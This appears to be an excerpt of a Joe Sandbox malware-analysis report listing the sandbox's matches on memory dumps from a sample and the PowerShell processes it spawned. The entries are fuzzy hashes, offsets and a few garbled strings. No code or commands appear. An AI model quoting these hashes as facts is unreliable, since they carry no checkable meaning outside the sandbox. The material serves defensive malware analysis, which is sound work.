                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: e9c753c3cf88ee9514b90af05ed3b29a560b97cdc88a2d1d535d2e09f888dd1d
                                                                                                                                                                                                                      • Instruction ID: 4fb218c4eb5a366c72c3c452a37542ad994cce72db3be50fa6cad3c0223d7357
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e9c753c3cf88ee9514b90af05ed3b29a560b97cdc88a2d1d535d2e09f888dd1d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E901F7718047849AEB2A9AD9DD84B26BFE8DF51329F08C45AED0D0A2C2C7B89840C671
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.3414238029.000000000110D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0110D000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_110d000_YYjRtxS70h.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: f8f3f173fc1deaf20dc5de9f2492a6f54e8d97e8b6cb1a87ceece0d35c9f5517
                                                                                                                                                                                                                      • Instruction ID: fbc3138d73a289f9ceaa846f2873838bd5b4ca144c7822eaf00b09145cb8e647
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f8f3f173fc1deaf20dc5de9f2492a6f54e8d97e8b6cb1a87ceece0d35c9f5517
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 55F0C2714043849EEB258E59DD88B62FF98EB40334F18C05AED0C4B2C6C3789840CA70
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000002.00000002.2029807320.000000000315D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0315D000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_315d000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 36fb76e657281f5c21157fb550ed596ee0e9dce212e671c437caf9449710a75d
                                                                                                                                                                                                                      • Instruction ID: be8d082f8bef263aa2e81050a150a28a846e955f46396a520425c70b513c3238
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 36fb76e657281f5c21157fb550ed596ee0e9dce212e671c437caf9449710a75d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3701DF72009340DBE7208B29EC84B66BF98DB59365F1CC45AFC280A286C7789882C7B1
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000002.00000002.2029807320.000000000315D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0315D000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_315d000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 5e3c86dedc9f7649f185bf4c545c33b4e358dac87d05a9eb4eb52fbcafa8e887
                                                                                                                                                                                                                      • Instruction ID: 3a27bf63025635d9dcb276e07031607d9aabfadf5925c2ac92f3381ff092bc0d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e3c86dedc9f7649f185bf4c545c33b4e358dac87d05a9eb4eb52fbcafa8e887
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 81015E6240E3C09FD7128B259C94B52BFB8DF57225F1D80DBEC988F297C2699845C772
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000002.00000002.2030026328.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_31c0000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: b52442a914de4fe824c0a3c3dfb4aacb27af379eb9269159e598dc165b80915c
                                                                                                                                                                                                                      • Instruction ID: d3d72f8fd4f01e5bdd50e262d92196ef7e4ececd5261980c2722f16f76dd7c60
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b52442a914de4fe824c0a3c3dfb4aacb27af379eb9269159e598dc165b80915c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 10F0D435A001099FCB15CF9DD890AEEF7B1FF88324F248159E529A72A1C736EC52CB60
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2020645403.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2b00000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 071080916b087dc981e9455837648b52ba59bdac1216bafde7ea6f29581567f1
                                                                                                                                                                                                                      • Instruction ID: 071972b6f83312cded62a8397a6fa6d9321045759c2ce9a3a944dccb3a3cd2c2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 071080916b087dc981e9455837648b52ba59bdac1216bafde7ea6f29581567f1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 99916171F007295BDB1AEBB588145AFBBE2EF94704B00895DD50A9B380DF746D0B8BC6
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2020645403.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2b00000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: a2e32e5f4a4a9795552636ab8ad01d4cca25e42be65cd1cd8c3f0656951ba055
                                                                                                                                                                                                                      • Instruction ID: 43c58a7edc737359d980b4813597fbdc162424b19c447e95eda585328556aa84
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a2e32e5f4a4a9795552636ab8ad01d4cca25e42be65cd1cd8c3f0656951ba055
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8D915271F007295BDB1AEBB584546AFBAE3EF84704B00895DD50AAB340DF7469078BC6
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2025930122.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6e70000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: 4'^q$4'^q$piIk$piIk$piIk$piIk$piIk$|,Kk
                                                                                                                                                                                                                      • API String ID: 0-3823266662
                                                                                                                                                                                                                      • Opcode ID: e01f0ab702d09e0691069a49601f74956199680e83418f32de37549d711b190f
                                                                                                                                                                                                                      • Instruction ID: b24bb6f29c6c282045eaa7acc2a6882a5b9e49c7df6b1d27195936a4f88d3d70
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e01f0ab702d09e0691069a49601f74956199680e83418f32de37549d711b190f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 88222631B00315DFDB609B6889457AABBF2AF88315F1484BADA05CF241DB31DE85C7E2
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2025930122.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6e70000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                                                                                                                                                      • API String ID: 0-1420252700
                                                                                                                                                                                                                      • Opcode ID: 1f3ffd03e32af790d3d0c67785f1a5b4e175a44d21a2ce15103a9173ee167ba5
                                                                                                                                                                                                                      • Instruction ID: c2834f61665474a5e658c64bf900f1fa718ac52b986a6746fd5c293605f15266
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1f3ffd03e32af790d3d0c67785f1a5b4e175a44d21a2ce15103a9173ee167ba5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A4126631B04315CFDBA59B6888117AABBE2AFD5319F1484BAD505CF381DB31DC45C7A2
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2020645403.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2b00000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: (bq
                                                                                                                                                                                                                      • API String ID: 0-149360118
                                                                                                                                                                                                                      • Opcode ID: 288951cee462ce76e247782a53f7b51003feb1034064391c4ab0fa031210aa6f
                                                                                                                                                                                                                      • Instruction ID: 55a5134a1aa04582c554ba1591dcb58e030716697c94fa773e9858fa889e886c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 288951cee462ce76e247782a53f7b51003feb1034064391c4ab0fa031210aa6f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 61413874B042048FDB15DF69C498AAABBF2EF8D315F1445A9E406AB391DF31EC01CB60
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2020645403.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2b00000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: (&^q
                                                                                                                                                                                                                      • API String ID: 0-2067289071
                                                                                                                                                                                                                      • Opcode ID: cc6cfbf2bac941c5d67fdde0217d5c8cb3312ca5a5792fcb651784414955fffb
                                                                                                                                                                                                                      • Instruction ID: a8e87f2e4b719d3b8dc1641c0a63574d553bc46db7e972cd9c629ea849c9954c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cc6cfbf2bac941c5d67fdde0217d5c8cb3312ca5a5792fcb651784414955fffb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0721BC72A003588FCB15DFAED444A9EBFF5EF89320F14846AD519E7340CB3499058FA5
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2020645403.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2b00000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: </vl
                                                                                                                                                                                                                      • API String ID: 0-2513005275
                                                                                                                                                                                                                      • Opcode ID: ed8e01db27ab85a64c1da18a12c2f1479128be3628d926acc63af4bfb3238fec
                                                                                                                                                                                                                      • Instruction ID: 73045eae1db678720a1ac317fa2b3f39417d4212adcd76d0314b2585dcb8fe91
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ed8e01db27ab85a64c1da18a12c2f1479128be3628d926acc63af4bfb3238fec
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B62192713043159FC711DB69D980A5ABBE5FF8935470489A9E409CF792DB34EC45CB90
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2020645403.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2b00000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: </vl
                                                                                                                                                                                                                      • API String ID: 0-2513005275
                                                                                                                                                                                                                      • Opcode ID: 19cc62512d7787e251c80165609bd08df24255b5b05c6a18a8268f6bc20ba601
                                                                                                                                                                                                                      • Instruction ID: ab088dac756b50133dacb6fab4877197825a0035cd5c659aba7d0e06d8df1609
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 19cc62512d7787e251c80165609bd08df24255b5b05c6a18a8268f6bc20ba601
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F3218BB07003159FCB11DBA9D880E5ABBE6FF89254B00C9A9E409CF795DB30EC45CB90
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2020645403.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2b00000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 27fa71561c61863d024e7286cfb02e443587a64aa9701991f4f484b53b868cbd
                                                                                                                                                                                                                      • Instruction ID: 8751e13b08e3d300c6e5d64a1cf60ac8b003043156e48861c79374478234def7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 27fa71561c61863d024e7286cfb02e443587a64aa9701991f4f484b53b868cbd
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D919D74A002058FCB16CF59C4D8AAEFBB1FF48310B248599D915AB3A5C735FC95CBA0
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2020645403.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2b00000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 1353bab6382b55734bb4b5140f202eb9f2c269703cdd4b046a1988fdb5a2bb23
                                                                                                                                                                                                                      • Instruction ID: 5305f0d43737ca3a25b74709f7a39a2471b8ae390d3dfb8fa49d93a768d3b01a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1353bab6382b55734bb4b5140f202eb9f2c269703cdd4b046a1988fdb5a2bb23
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F6106B1E002489FCB15DFA9D584B9DFFF1EF88314F148069E919AB354DB349846CB51
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2020645403.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2b00000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 6b835dbbda7a419e73ebc2ebfc9e81e04d5e60ad01227bebdccb90a8a8905816
                                                                                                                                                                                                                      • Instruction ID: 57e46394abd74313873c6f6f29c16f128f293565481a6db2532aa83140a0aa47
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6b835dbbda7a419e73ebc2ebfc9e81e04d5e60ad01227bebdccb90a8a8905816
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7E51AE343003159FD705DB6AD894A7ABBEAFF88255B1585AAE409CB391DF31F801CB90
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2020645403.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2b00000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 3224f442b6008a04d34159cac851f7bac9c0bd89477f2dc4ae0fe3498e174859
                                                                                                                                                                                                                      • Instruction ID: 72e58aac8b428a3d7e7d5acd1a6b95810e07150f0ba3163f66d34a57a28c003f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3224f442b6008a04d34159cac851f7bac9c0bd89477f2dc4ae0fe3498e174859
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3561F6B1E002489FCB15DFA9D584A9DFFF1EF88314F188169E909AB354EB349C46CB50
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2025930122.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6e70000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: b67a7605cdb32859d412b67ea2df9ecd86407d7863893ed70387120fa59f2554
                                                                                                                                                                                                                      • Instruction ID: eb7c9b71f9222b57eb1fcd7ec92d51743ea5e4837cfed76e588c2bf8eb74f179
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b67a7605cdb32859d412b67ea2df9ecd86407d7863893ed70387120fa59f2554
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 22412431E04305DFCBE48B648601AFABBE2DF80648F1494A6EA049F355D731ED49DBE2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2020645403.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2b00000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 60085cc80d3bde49b4228251274ebd1f39d01606c89a4592f2615e8dc69b7dfe
                                                                                                                                                                                                                      • Instruction ID: a131d882daf5ffdb70da19b23785b784c996028d29e24306c66772993cf2a300
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 60085cc80d3bde49b4228251274ebd1f39d01606c89a4592f2615e8dc69b7dfe
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8C417AB4A006059FCB16CF58C4D8AAEFBB1FF48310B158199D915AB3A4C736FC95CBA0
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2020645403.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2b00000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 71289120b8aebff73ef8e70187eccce68a153270be0729c390d4248537446baf
                                                                                                                                                                                                                      • Instruction ID: c074a9709a6e6d741e587e70c2419fa80c8dbd62af3c4f941abaf9652e93216b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 71289120b8aebff73ef8e70187eccce68a153270be0729c390d4248537446baf
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 92314A75A002158FCB05CF65C898AAAFBF2EB8D314F1450A9E402AB391DF31ED01DBA1
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2020645403.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2b00000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 4ee700f2faec33ae64710652a7654c27c0feb2940050856181f3ec773e40cc18
                                                                                                                                                                                                                      • Instruction ID: 0423c9d49202a8510827a6a2b370eb9b5f62b97f789c8f4b9326d584f9adef57
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4ee700f2faec33ae64710652a7654c27c0feb2940050856181f3ec773e40cc18
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 53319E313006109FC716DB78E890B5ABB92EFD4226F048669E609CB390DF70A846CB90
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2020645403.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2b00000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: c48f454c911a0e77a22b27d0f207bcd2d15d69f7e5af1f8db9ae930149816432
                                                                                                                                                                                                                      • Instruction ID: 74f8e12a3b81aae47d091271fd5e923092e96c6a25dd8e09d9dc4626c82d8cbe
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c48f454c911a0e77a22b27d0f207bcd2d15d69f7e5af1f8db9ae930149816432
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EC316D71A006099FDB05DB69D4947AEBFF6EF88310F148469E605E7390EB349C428B91
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2020645403.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2b00000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: cc919b5250bd69aadb4db63a7a8211954cd9f339136bea41864c5ed9864ddf29
                                                                                                                                                                                                                      • Instruction ID: 5fc5ed9482cde1b7995d891caf33e1e5d0dd65a6e031cfab8f3c229e5c40e8e4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cc919b5250bd69aadb4db63a7a8211954cd9f339136bea41864c5ed9864ddf29
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 95318EB4A402099FDB05EB64D854ABF7BB3EFC5300F1188A9E514AB395DE399D018FA1
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2020645403.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2b00000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: f2caf74efdc69a0548aaba83eeb0b963d390ed73d997ba9fa28d8045f5b77fbd
                                                                                                                                                                                                                      • Instruction ID: 3b5b8b1a4fa40d89feee406e37fd83d24bf57804ae69b567a2d67a5c3194cabd
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f2caf74efdc69a0548aaba83eeb0b963d390ed73d997ba9fa28d8045f5b77fbd
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9D313A75A002058FCB14DF68D498A9EBBF2FF89314F144969E806E7390DF749C86CB91
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2020645403.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2b00000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 04ec8497a32ab23a2aa0064645970ee1d71611198f1728d66e5a73671838c8e9
                                                                                                                                                                                                                      • Instruction ID: 46a75f34b67a3f5b02f7b1555d3185b769057af8ffb73b6e567a4cd8534d7e63
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 04ec8497a32ab23a2aa0064645970ee1d71611198f1728d66e5a73671838c8e9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6F315EB0E002099FDB15DF69C4947AEBFF6EF88354F108469E605E7390EB349C028B91
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2020645403.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2b00000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 6f7bce78f17be443e0c2de4c80ba60b0b4fbf2436d4335ba861cbd3637d99a25
                                                                                                                                                                                                                      • Instruction ID: 27c02d832fcae43d8713f68156d6bc8605fd426b0fcab2733eb7163fde4bfebe
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f7bce78f17be443e0c2de4c80ba60b0b4fbf2436d4335ba861cbd3637d99a25
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 553189B5A01B448EDB61CF6AD4883DAFFF2EF88320F28C45AD81D97286C77454818B61
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2020645403.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2b00000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: a5aea2ccf757b046bca27ca8922908f13bdfec33b1bbadd5d03e3fd190e488e8
                                                                                                                                                                                                                      • Instruction ID: 5c4a78d36dc1dc2b1ae453c56d19e995bf4b3b7c80c07adf9422e7fc0403c4b6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a5aea2ccf757b046bca27ca8922908f13bdfec33b1bbadd5d03e3fd190e488e8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 49310874A002188FCB14DF68D4A8A9EBBF2AF88315F144969D906E7390DF74DC85CB91
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2020645403.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2b00000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: c6bbf5689e695b001ee2764ee2632cf487ceda4a05f6dffa058f4f37c8a8b964
                                                                                                                                                                                                                      • Instruction ID: b4f15c4b44106460a108b82c400630b1de032d72e793bca48bdc07a55dfadee1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c6bbf5689e695b001ee2764ee2632cf487ceda4a05f6dffa058f4f37c8a8b964
